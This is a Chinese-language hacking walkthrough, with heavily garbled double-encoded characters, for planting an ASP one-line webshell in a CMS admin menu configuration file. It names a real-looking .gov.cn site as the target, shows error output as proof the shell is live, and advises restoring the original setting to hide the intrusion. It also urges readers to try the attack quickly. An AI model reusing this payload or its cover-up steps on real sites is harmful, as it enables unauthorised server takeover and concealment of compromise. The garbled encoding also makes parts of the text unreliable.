1,用超管登陸
2,進(jìn)入 文章中心管理 頂部菜單設(shè)置 菜單其它特效
filter:Glow(Color=#000000, Strength=3) 我們幫他保存一下 等下要還原的!
3,插入一句話馬
"%><%execute request("l")%><%' '號(hào) 一定要
頂部欄目菜單參數(shù)設(shè)置成功!
這時(shí) 我們插入了一個(gè)馬 地址在下面 rootclass_menu_config.asp 這個(gè)文件 我們看一下
http://www.leisure.gov.cn/admin/rootclass_menu_config.asp
Microsoft VBScript 運(yùn)行時(shí)錯(cuò)誤 錯(cuò)誤 '800a000d'
類型不匹配: 'execute'
/admin/rootclass_menu_config.asp,行 11
顯示 成功??!
連接1句話
http://www.leisure.gov.cn/admin/ok2.asp 這個(gè)就是小馬的地址了
我就不傳大馬上去了 這時(shí)候 已經(jīng)99%可以拿到webshell了?。?BR>4,記得進(jìn)了webshell后把源文件 rootclass_menu_config.asp 改回來 ,不然太明顯了!
現(xiàn)在我們?cè)倏纯催@個(gè) 頂部菜單設(shè)置
不行了吧??!所以要改回來! 在admin下這個(gè)文件
Const RCM_Menu_9=""%><%execute request("l")%><%'" '其它特效
這個(gè)就是插入的效果 我們改回來
Const RCM_Menu_9="filter:Glow(Color=#000000, Strength=3)" '其它特效
慢了點(diǎn)
這樣 我們就可以利用前段時(shí)間出來的根據(jù)短消息那個(gè)注入 拿到一個(gè)webshell 大家趕快去試吧!不然完了就來不及了!!
現(xiàn)在正常了吧 !哈哈 88

































